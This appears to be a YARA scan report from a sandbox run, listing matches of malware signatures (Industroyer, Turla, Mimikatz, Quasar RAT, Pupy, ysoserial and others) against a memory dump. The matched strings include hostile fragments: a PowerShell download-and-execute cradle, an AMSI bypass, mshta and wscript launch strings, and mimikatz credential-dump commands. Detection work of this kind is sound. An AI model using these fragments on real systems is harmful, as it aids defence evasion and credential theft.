00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Industroyer_Malware_5	Detects Industroyer related malware	Florian Roth	0x759ab:$x1: D2MultiCommService.exe 0x759df:$x2: Crash104.dll 0x75a09:$x3: iec104.log 0x75a31:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x75a77:$s1: Error while getaddrinfo executing: %d 0x75aba:$s2: return info-Remote command 0x75af2:$s3: Error killing process ... 0x75b29:$s4: stop_comm_service_name 0x75b5d:$s5: 1 Data exchange: Send: %d (%s)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Unit78020_Malware_Gen1	Detects malware by Chinese APT PLA Unit 78020 - Generic Rule	Florian Roth	0x106027:$x2: POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1 0x106072:$x3: GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1 0x106260:$a2: User-Agent: Netscape 0x107135:$a2: User-Agent: Netscape 0x10638a:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0x107167:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0x106518:$s7: /%d%s%d 0x1065cc:$s11: GET %dHTTP/1.1 0x107335:$s11: GET %dHTTP/1.1 0x1065f9:$s12: POST http://%ws:%d/%d%s%dHTTP/1.1 0x1070d6:$s12: POST http://%ws:%d/%d%s%dHTTP/1.1 0x106639:$s13: PeekNamePipe 0x1072e1:$s13: PeekNamePipe 0x106664:$s14: Normal.dot 0x10668d:$s15: R_eOR_eOR_eO)CiOS_eO 0x1066eb:$s17: %s %s %s %s %d %d %d %d
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Unit78020_Malware_Gen3	Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong	Florian Roth	0x107098:$x1: GET http://%ws:%d/%d%s%dHTTP/1.1 0x1065f9:$x2: POST http://%ws:%d/%d%s%dHTTP/1.1 0x1070d6:$x2: POST http://%ws:%d/%d%s%dHTTP/1.1 0x106260:$s1: User-Agent: Netscape 0x107135:$s1: User-Agent: Netscape 0x10638a:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0x107167:$s2: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 0x10728f:$s5: MM.exe 0x106639:$s7: PeekNamePipe 0x1072e1:$s7: PeekNamePipe 0x10730b:$s8: Host: %ws:%d 0x1065cc:$s9: GET %dHTTP/1.1 0x107335:$s9: GET %dHTTP/1.1 0x107362:$s10: SCHANNEL.DLL
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0xefb0:$s2: _ScreenshotLogger 0xefdf:$s3: _PasswordStealer
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WindowsShell_s3	Detects simple Windows shell - file s3.exe	Florian Roth	0xf611a:$s1: cmd - execute cmd.exe 0xf698a:$s1: cmd - execute cmd.exe 0xf7088:$s1: cmd - execute cmd.exe 0xf618d:$s3: get <remote> <local> - download file 0xf69fd:$s3: get <remote> <local> - download file 0xf70cc:$s3: get <remote> <local> - download file 0xf61cf:$s4: [ simple remote shell for windows v3 0xf6249:$s6: put <local> <remote> - upload file 0xf7146:$s6: put <local> <remote> - upload file 0xf6289:$s7: term - terminate remote client 0xf7186:$s7: term - terminate remote client 0xf6311:$s9: -l Listen for incoming connections 0xf66b5:$s9: -l Listen for incoming connections 0xf6b2f:$s9: -l Listen for incoming connections
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WindosShell_s1	Detects simple Windows shell - file s1.exe	Florian Roth	0xf657c:$s1: [ executing cmd.exe 0xf65ad:$s2: [ simple remote shell for windows v1 0xf65ef:$s3: -p <number> Port number to use (default is 443) 0xf663d:$s4: usage: s1 <address> [options] 0xf6678:$s5: [ waiting for connections on %s 0xf6311:$s6: -l Listen for incoming connections 0xf66b5:$s6: -l Listen for incoming connections 0xf6b2f:$s6: -l Listen for incoming connections 0xf66ff:$s7: [ connection from %s 0xf6731:$s8: [ %c%c requires parameter 0xf6dcf:$s8: [ %c%c requires parameter
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WindowsShell_Gen	Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe	Florian Roth	0xf6731:$s0: [ %c%c requires parameter 0xf6dcf:$s0: [ %c%c requires parameter 0xf6e06:$s1: [ %s : %i 0xf6e2d:$s2: [ %s : %s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WindowsShell_Gen2	Detects simple Windows shell - from files s3.exe, s4.exe	Florian Roth	0xf611a:$s1: cmd - execute cmd.exe 0xf698a:$s1: cmd - execute cmd.exe 0xf7088:$s1: cmd - execute cmd.exe 0xf618d:$s2: get <remote> <local> - download file 0xf69fd:$s2: get <remote> <local> - download file 0xf70cc:$s2: get <remote> <local> - download file 0xf6249:$s4: put <local> <remote> - upload file 0xf7146:$s4: put <local> <remote> - upload file 0xf6289:$s5: term - terminate remote client 0xf7186:$s5: term - terminate remote client 0xf720c:$s7: [ error : received %i bytes
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PassCV_Sabre_Malware_2	PassCV Malware mentioned in Cylance Report	Florian Roth	0x45082:$x1: ncProxyXll 0x451ed:$x1: ncProxyXll 0xcb5d3:$x1: ncProxyXll 0x450aa:$s1: Uniscribe.dll 0xcb5fb:$s1: Uniscribe.dll 0x605fc:$s2: WS2_32.dll 0xcb626:$s2: WS2_32.dll 0x16a832:$s2: WS2_32.dll 0xcb645:$s3: ProxyDll 0xcb66b:$s4: JDNSAPI.dll 0xcb694:$s5: x64.dat 0xcb6b9:$s6: LSpyb2
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Turla_APT_Malware_Gen1	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xeae4e:$x1: too long data for this type of transport 0xeae94:$x2: not enough server resources to complete operation 0xeaee3:$x3: Task not execute. Arg file failed. 0xeaf5f:$s1: peer has closed the connection 0xeaf9b:$s2: tcpdump.exe 0xeafc4:$s3: windump.exe 0xeafed:$s4: dsniff.exe 0x6b4da:$s5: wireshark.exe 0xeb015:$s5: wireshark.exe 0xeb040:$s6: ethereal.exe 0xeb06a:$s7: snoop.exe 0xeb091:$s8: ettercap.exe 0xeb0bb:$s9: miniport.dat 0xeb0e6:$s10: net_password=%s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Turla_APT_Malware_Gen2	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xeb38e:$x1: Internal command not support =(( 0xeb3cc:$x2: L\|-1\|AS_CUR_USER:OpenProcessToken():%d, %s\| 0xeb415:$x3: L\|-1\|CreateProcessAsUser():%d, %s\| 0xeb3d1:$x4: AS_CUR_USER:OpenProcessToken():%d 0xeb455:$x4: AS_CUR_USER:OpenProcessToken():%d 0xeb494:$x5: L\|-1\|AS_CUR_USER:LogonUser():%d, %s\| 0xeb4d6:$x6: L\|-1\|try to run dll %s with user priv\| 0xeb586:$x9: Plugin dll stop failed. 0xeb5bc:$x10: AS_USER:LogonUser():%d 0xeab38:$s2: msimghlp.dll 0xeb619:$s2: msimghlp.dll 0xeb643:$s3: ximarsh.dll 0xeb66c:$s4: msximl.dll 0xeb694:$s5: INTERNAL.dll 0xeb6f1:$s7: ieuser.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Turla_APT_Malware_Gen3	Detects Turla malware (based on sample used in the RUAG APT case)	Florian Roth	0xeba07:$x2: WaitMutex Abandoned %p 0xeba3b:$x3: OPER\|Wrong config: no port\| 0xeba74:$x4: OPER\|Wrong config: no lastconnect\| 0xebab4:$x5: OPER\|Wrong config: empty address\| 0xebaf3:$x6: Trans task %d obj %s ACTIVE fail robj %s 0xebb39:$x7: OPER\|Wrong config: no auth\| 0xebb72:$x8: OPER\|Sniffer '%s' running... ooopppsss...\| 0xebcb3:$s3: www.yahoo.com 0xebd05:$s5: www.bing.com 0xebd2f:$s6: %s: http://%s%s 0xebd5c:$s7: /javascript/view.php 0xebd8e:$s8: Task %d failed %s,%d 0xeb994:$s9: Mozilla/4.0 (compatible; MSIE %d.0;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	redSails_PY	Detects Red Sails Hacktool - Python	Florian Roth	0x55262:$x1: Gained command shell on host 0x5529c:$x2: [!] Received an ERROR in shell() 0x552da:$x3: Target IP address with backdoor installed 0x55321:$x4: Open backdoor port on target machine 0x55363:$x5: Backdoor port to open on victim machine
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Malware_PutterPanda_Rel	Detects an APT malware related to PutterPanda	Florian Roth	0x164c1f:$x0: app.stream-media.net 0x164c51:$x1: File %s does'nt exist or is forbidden to acess! 0x164c9e:$s6: GetProcessAddresss of pHttpQueryInfoA Failed! 0x164ce9:$s7: Connect %s error! 0x164d18:$s9: Download file %s successfully! 0x164d55:$s10: index.tmp 0x164d7d:$s11: Execute PE Successfully 0x164db3:$s13: aa/22/success.xml 0x164de3:$s16: aa/22/index.asp 0x164e11:$s18: File %s a Non-Pe File 0x164e45:$s19: SendRequset error! 0x164e76:$s20: filelist[%d]=%s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Rehashed_RAT_2	Detects malware from Rehashed RAT incident	Florian Roth	0x5ae29:$x1: dalat.dulichovietnam.net 0x5ae5f:$x2: web.Thoitietvietnam.org 0x5ae94:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64) 0x5aef7:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3 0x5af8c:$s1: GET /%s%s%s%s HTTP/1.1 0x5afc0:$s2: http://%s:%d/%s%s%s%s 0x5aff3:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Malware_QA_vqgk	VT Research QA uploaded malware - file vqgk.dll	Florian Roth	0x66d03:$x3: %d is an x86 process (can't inject x64 content) 0x763aa:$x3: %d is an x86 process (can't inject x64 content) 0xd8374:$x3: %d is an x86 process (can't inject x64 content) 0x4f046:$x4: %d is an x64 process (can't inject x86 content) 0xd83c1:$x4: %d is an x64 process (can't inject x86 content) 0x763f7:$s2: Could not open process token: %d (%u) 0xd845f:$s2: Could not open process token: %d (%u) 0x4f093:$s5: Failed to impersonate logged on user %d (%u) 0x66dfd:$s5: Failed to impersonate logged on user %d (%u) 0xd850f:$s5: Failed to impersonate logged on user %d (%u) 0x4f12e:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x66d50:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x762f2:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd8559:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4f1f6:$s7: could not write to process memory: %d 0xd85c0:$s7: could not write to process memory: %d 0xd8603:$s8: beacon.dll 0x66db7:$s9: Failed to impersonate token from %d (%u) 0xd862b:$s9: Failed to impersonate token from %d (%u)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x5f370:$x1: reflectively inject a dll into a process. 0x5f3b7:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid 0x5f411:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null 0x5f474:$x4: reflective_inject_dll 0x5f559:$x4: reflective_inject_dll 0x5f58c:$x4: reflective_inject_dll 0xb07a3:$x4: reflective_inject_dll 0x5f3b7:$x5: ld_preload_inject_dll 0x5f4a7:$x5: ld_preload_inject_dll 0x5f4da:$x6: get_pupy_config() -> string 0x5f513:$x7: [INJECT] inject_dll. OpenProcess failed. 0x5f474:$x8: reflective_inject_dll 0x5f559:$x8: reflective_inject_dll 0x5f58c:$x8: reflective_inject_dll 0xb07a3:$x8: reflective_inject_dll 0x5f58c:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0x5f5e8:$x10: linux_inject_main
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	IronPanda_DNSTunClient	Iron Panda malware DnsTunClient - file named.exe	Florian Roth	0x1075cb:$s1: dnstunclient -d or -domain <domain> 0x10760c:$s2: dnstunclient -ip <server ip address> 0x10774f:$s5: taskkill /im conime.exe 0x1077dc:$s7: UDP error:can not bing the port(if there is unclosed the bind process?) 0x107841:$s8: use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s) 0x1078aa:$s9: error: packet num error.the connection have condurt,pls try later 0x10790a:$s10: Coversation produce one error:%s,coversation fail 0x10795a:$s11: try to add many same pipe to select group(or mark is too easy).
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	IronPanda_Malware_Htran	Iron Panda Malware Htran	Florian Roth	0x108287:$s1: [-] Gethostbyname(%s) error:%s 0x1082c3:$s2: %s -<listen\|tran\|slave> <option> [-log logfile] 0x1301e7:$s2: %s -<listen\|tran\|slave> <option> [-log logfile] 0x17e87a:$s2: %s -<listen\|tran\|slave> <option> [-log logfile] 0x108310:$s3: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0x10836e:$s4: [-] ERROR: Must supply logfile name. 0x1083b0:$s5: [SERVER]connection to %s:%d error 0x131d0e:$s5: [SERVER]connection to %s:%d error 0x13dac2:$s5: [SERVER]connection to %s:%d error 0x1577bb:$s5: [SERVER]connection to %s:%d error 0x17e8f0:$s5: [SERVER]connection to %s:%d error 0x1083ef:$s6: [+] Make a Connection to %s:%d.... 0x1579a1:$s6: [+] Make a Connection to %s:%d.... 0x10842f:$s7: [+] Waiting another Client on port:%d.... 0x157a25:$s7: [+] Waiting another Client on port:%d.... 0x108476:$s8: [+] Accept a Client on port %d from %s 0x1578fc:$s8: [+] Accept a Client on port %d from %s 0x157a6d:$s8: [+] Accept a Client on port %d from %s 0x1084ba:$s9: [+] Make a Connection to %s:%d ...... 0x1084fe:$s10: cmshared_get_ptr_from_atom 0x108538:$s10: cmshared_get_ptr_from_atom
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PP_CN_APT_ZeroT_3	Detects malware from the Proofpoint CN APT ZeroT incident	Florian Roth	0xb71e7:$s1: /svchost.exe 0xb783f:$s1: /svchost.exe 0xb7e7f:$s1: /svchost.exe 0xb7211:$s2: RasTls.dll 0xb7b37:$s2: RasTls.dll 0xb7ea9:$s2: RasTls.dll 0xb7239:$s3: 20160620.htm 0xb72ac:$s3: 20160620.htm 0xb7ed1:$s3: 20160620.htm 0xb7efc:$s3: 20160620.htm 0xb7263:$s4: * $l&$ 0xb7287:$s5: dfjhmh 0xb72ab:$s6: /20160620.htm 0xb7efb:$s6: /20160620.htm
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PP_CN_APT_ZeroT_5	Detects malware from the Proofpoint CN APT ZeroT incident	Florian Roth	0xb77f1:$x1: dbozcb 0xb5c03:$s1: nflogger.dll 0xb7815:$s1: nflogger.dll 0xb8180:$s1: nflogger.dll 0xb71e7:$s2: /svchost.exe 0xb783f:$s2: /svchost.exe 0xb7e7f:$s2: /svchost.exe 0xb7869:$s3: 1207.htm 0xb7890:$s3: 1207.htm 0xb788f:$s4: /1207.htm
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CN_APT_ZeroT_extracted_Mcutil	Chinese APT by Proofpoint ZeroT RAT - file Mcutil.dll	Florian Roth	0xb647a:$s1: LoaderDll.dll 0xb64a5:$s2: QageBox1USER 0xb64cf:$s3: xhmowl 0xb64f3:$s4: ?KEYKY 0xb6517:$s5: HH:mm:_s 0xb653d:$s6: =licni] has maX0t
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Microcin_Sample_5	Malware sample mentioned in Microcin technical report by Kaspersky	Florian Roth	0x57422:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary 0x57487:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option> 0x57571:$x5: No password found! 0x575a1:$x7: Can not found the Password Dictoonary file!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x787a6:$s2: logC.dll 0x78818:$s5: Logger Name:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x679d4:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JS_Suspicious_MSHTA_Bypass	Detects MSHTA Bypass	Florian Roth	0x5bcfc:$s1: mshtml,RunHTMLApplication 0x67ecc:$s1: mshtml,RunHTMLApplication 0x67f38:$s3: /c start mshta j
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JavaScript_Run_Suspicious	Detects a suspicious Javascript Run command	Florian Roth	0x5d5e3:$s1: w = new ActiveXObject( 0x5d60e:$s2: w.Run(r);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x989c5:$s2: Auditcleaner 0x98a41:$s2: Auditcleaner 0xa110b:$s11: elatedmonkey 0xa1194:$s11: elatedmonkey 0x992f8:$s17: ys.ratload.sh 0x96c02:$elf4: charm_saver 0x9c398:$elf8: ebbshave 0x9c415:$elf8: ebbshave 0x9c780:$elf9: eggbasket 0x9c7fe:$elf9: eggbasket 0x9fd01:$elf12: envoytomato 0x9fd7c:$elf12: envoytomato 0x9f9d1:$elf14: estopmoonlit 0x9fa4d:$elf14: estopmoonlit 0xa1f54:$elf17: ghost_sparc 0xa1fe6:$elf17: ghost_sparc 0x9ea50:$elf18: jackpop 0x9eacc:$elf18: jackpop 0x94ab4:$elf19: orleans_stride 0x953a9:$elf21: seconddate 0x96c02:$pe2: charm_saver
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ysoserial_Payload_Spring1	Ysoserial Payloads - file Spring1.bin	Florian Roth	0xb5527:$x1: ysoserial/Pwner
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ysoserial_Payload	Ysoserial Payloads	Florian Roth	0xb572e:$x1: ysoserial/payloads/ 0xb5756:$s1: StubTransletPayload 0xb5787:$s2: Pwnrpw
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ysoserial_Payload_3	Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin	Florian Roth	0xb5a07:$x1: ysoserialq 0xb5a2f:$s1: targetClassInterceptorMetadatat 0xb5a6c:$s2: targetInstancet 0xb5a99:$s3: targetClassL 0xb5ac3:$s4: POST_ACTIVATEsr 0xb5af0:$s5: PRE_DESTROYsq
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x10c342:$s11: sekurlsa::pth
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_2	Mimikatz Rule generated from a memory dump	Florian Roth - Florian Roth	0xeca61:$s0: sekurlsa:: 0x10c342:$s0: sekurlsa:: 0x1836af:$s0: sekurlsa:: 0x1836ce:$x1: cryptprimitives.pdb 0x1836f6:$x2: Now is t1O 0x18371e:$x4: ALICE123 0x18373b:$x5: BOBBY456
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mimikatz_Logfile	Detects a log file generated by malicious hack tool mimikatz	Florian Roth	0x178a79:$s1: SID : 0x178aaa:$s2: * NTLM : 0x178ad4:$s3: Authentication Id : 0x178b05:$s4: wdigest :
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xeca61:$x1: sekurlsa::logonpasswords 0xeca9c:$x2: List tickets in MIT/Heimdall ccache 0xecae2:$x3: kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x 0xecb3b:$x4: * Injecting ticket : 0xecb72:$x5: mimidrv.sys 0xecba0:$x6: Lists LM & NTLM credentials 0xecbdf:$x7: \_ kerberos - 0xecc0f:$x8: * unknow : 0xecc3f:$x9: \_ *Password replace -> 0xecc7a:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO 0xecce0:$x12: Switch to MINIDUMP :
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FiveEyes_QUERTY_Malwaresig_20123_cmdDef	FiveEyes QUERTY Malware - file 20123_cmdDef.xml	Florian Roth	0x180334:$s0: <shortDescription>Keystroke Collector</shortDescription> 0x18038a:$s1: This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description> 0x1803f6:$s2: <commands/> 0x18041f:$s3: </version> 0x18259e:$s3: </version> 0x180447:$s4: <associatedImplantId>20121</associatedImplantId> 0x180495:$s5: <rightsRequired>System or Administrator (if Administrator, I think the DriverIns 0x1804fa:$s6: <platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64 0x18055f:$s7: <projectpath>plugin/Collection</projectpath> 0x1805a9:$s8: <dllDepend>None</dllDepend> 0x1827dc:$s8: <dllDepend>None</dllDepend> 0x1805e2:$s9: <minorType>0</minorType> 0x18289c:$s9: <minorType>0</minorType> 0x180619:$s10: <pluginname>E_QwertyKM</pluginname> 0x18065b:$s11: </comments> 0x180685:$s12: <comments> 0x1806ae:$s13: <majorType>1</majorType> 0x1806e5:$s14: <files>None</files> 0x180717:$s15: <poc>Erebus</poc> 0x17fd6e:$s16: </plugin> 0x180747:$s16: </plugin>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FiveEyes_QUERTY_Malwareqwerty_20123	FiveEyes QUERTY Malware - file 20123.xml	Florian Roth	0x180ac0:$s0: edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) - 0x180b25:$s1: <configFileName>20123_cmdDef.xml</configFileName> 0x180b74:$s2: <name>20123.sys</name> 0x180c0d:$s4: <codebase>/bin/i686-pc-win32/debug</codebase> 0x17fd6e:$s6: </plugin> 0x180747:$s6: </plugin> 0x180c8b:$s6: </plugin> 0x18211b:$s6: </plugin> 0x17fd95:$s7: </pluginConfig> 0x180cb2:$s7: </pluginConfig> 0x182142:$s7: </pluginConfig> 0x17fdc2:$s8: <pluginConfig> 0x180cdf:$s8: <pluginConfig> 0x18216f:$s8: <pluginConfig> 0x17fdee:$s9: </platform> 0x180d0b:$s9: </platform> 0x18219b:$s9: </platform> 0x17fe17:$s10: </lpConfig> 0x180d35:$s10: </lpConfig> 0x1821c4:$s10: </lpConfig> 0x17fe41:$s11: <lpConfig>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FiveEyes_QUERTY_Malwaresig_20120_cmdDef	FiveEyes QUERTY Malware - file 20120_cmdDef.xml	Florian Roth	0x18175d:$s0: This PPC gets the current keystroke log. 0x1817a3:$s1: This command will add the given WindowTitle to the list of Windows to log keys f 0x181808:$s2: This command will remove the WindowTitle corresponding to the given window title 0x18186d:$s3: This command will return the current status of the Keyboard Logger (Whether it i 0x1818d2:$s4: This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w 0x181937:$s5: <definition>Turn logging of all keys on\|off</definition> 0x18198d:$s6: <name>Get Keystroke Log</name> 0x1819c9:$s7: <description>Keystroke Logger Lp Plugin</description> 0x181a1c:$s8: <definition>display help for this function</definition> 0x181a71:$s9: This command will switch ON Logging of keys. All keys taht are entered to a acti 0x181ad7:$s10: Set the log limit (in number of windows) 0x181b1e:$s11: <example>qwgetlog</example> 0x181b58:$s12: <aliasName>qwgetlog</aliasName> 0x181b96:$s13: <definition>The title of the Window whose keys you wish to Log once it becomes a 0x181bfc:$s14: This command will switch OFF Logging of keys. No keystrokes will be captured 0x181c67:$s15: <definition>The title of the Window whose keys you no longer whish to log</defin
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FiveEyes_QUERTY_Malwaresig_20121_cmdDef	FiveEyes QUERTY Malware - file 20121_cmdDef.xml	Florian Roth	0x182411:$s0: <shortDescription>Keystroke Logger Plugin.</shortDescription> 0x18246c:$s1: <message>Failed to get File Time</message> 0x1824b4:$s2: <description>Keystroke Logger Plugin.</description> 0x182505:$s3: <message>Failed to set File Time</message> 0x18254d:$s4: </commands> 0x182576:$s5: <commands> 0x18041f:$s6: </version> 0x18259e:$s6: </version> 0x1825c6:$s7: <associatedImplantId>20120</associatedImplantId> 0x182614:$s8: <message>No Comms. with Driver</message> 0x18265a:$s9: </error> 0x182681:$s10: <message>Invalid File Size</message> 0x1826c4:$s11: <platforms>Windows (User/Win32)</platforms> 0x18270e:$s12: <message>File Size Mismatch</message> 0x182752:$s13: <projectpath>plugin/Utility</projectpath> 0x18279a:$s14: <pluginsDepend>None</pluginsDepend> 0x1805a9:$s15: <dllDepend>None</dllDepend> 0x1827dc:$s15: <dllDepend>None</dllDepend> 0x182816:$s16: <pluginname>E_QwertyIM</pluginname> 0x182858:$s17: <rightsRequired>None</rightsRequired> 0x1805e2:$s18: <minorType>0</minorType>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	VUL_JQuery_FileUpload_CVE_2018_9206	Detects JQuery File Upload vulnerability CVE-2018-9206	Florian Roth	0x10f4e:$s1: error_reporting(E_ALL \| E_STRICT); 0x10f8e:$s2: require('UploadHandler.php'); 0x10fc9:$s3: $upload_handler = new UploadHandler();
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CACTUSTORCH	Detects CactusTorch Hacktool	Florian Roth	0x6371f:$x2: Copy the base64 encoded payload into the code variable below. 0x637ab:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 0x63824:$x5: ' Author: Vincent Yiu (@vysecurity)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_FIN7_Strings_Aug18_1	Detects strings from FIN7 report in August 2018	Florian Roth	0x16c1b:$s1: &&call %a01%%a02% /e:jscript 0x16c4c:$s2: wscript.exe //b /e:jscript %TEMP% 0x16c82:$s3: w=wsc@ript /b 0x16ca6:$s4: @echo %w:@=%\|cmd 0x16ccb:$s5: & wscript //b /e:jscript
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3e19c:$x1: GetKeyloggerLogsResponse 0xa3c54:$x1: GetKeyloggerLogsResponse 0xa3c8a:$x2: get_Keylogger 0xa3cb5:$x3: HandleGetKeyloggerLogsResponse 0xa3cf1:$s1: DoShellExecuteResponse 0xa3d25:$s2: GetPasswordsResponse 0xa3d57:$s3: GetStartupItemsResponse 0xa3d8c:$s4: <GetGenReader>b__7 0x3e2e5:$s5: RunHidden 0x3e34d:$s5: RunHidden 0x45976:$s5: RunHidden 0xa3dbc:$s5: RunHidden
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	OPCLEAVER_CCProxy_Config	CCProxy config known from Operation Cleaver	Florian Roth	0x185272:$s1: UserName=User-001 0x1852a1:$s2: Web=1 0x1852c4:$s3: Mail=1 0x1852e8:$s4: FTP=0 0x18530b:$x1: IPAddressLow=78.109.194.114
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	OpCloudHopper_Malware_5	Detects malware from Operation Cloud Hopper	Florian Roth	0xa9be9:$x1: CWINDOWSSYSTEMROOT 0xa9c19:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK 0xa9c57:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY 0xa9c90:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU 0xa9cc7:$s7: FALLINLOVE
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	OpCloudHopper_WmiDLL_inMemory	Malware related to Operation Cloud Hopper - Page 25	Florian Roth	0xa674b:$s1: wmi.dll 2>&1
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	VBS_WMIExec_Tool_Apr17_1	Tools related to Operation Cloud Hopper	Florian Roth	0xa8601:$a1: WMIEXEC ERROR: Command -> 0xa8630:$a2: WMIEXEC : Command result will output to 0xa8675:$a3: WMIEXEC : Target -> 0xa86a6:$a4: WMIEXEC : Login -> OK 0xa86d9:$a5: WMIEXEC : Process created. PID:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Regin_Related_Malware	Malware Sample - maybe Regin related	Florian Roth	0x165148:$s2: %x:%x:%x:%x:%x:%x:%x:%x%c 0x16517f:$s3: disp.dll 0x1651a5:$s4: msvcrtd.dll 0x1651ce:$s5: %d.%d.%d.%d%c
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationDrug_HDDSSD_Op	EquationDrug - HDD/SSD firmware operation - nls_933w.dll	Florian Roth @4nc4p	0x179f9c:$s0: nls_933w.dll 0x17a11d:$s0: nls_933w.dll
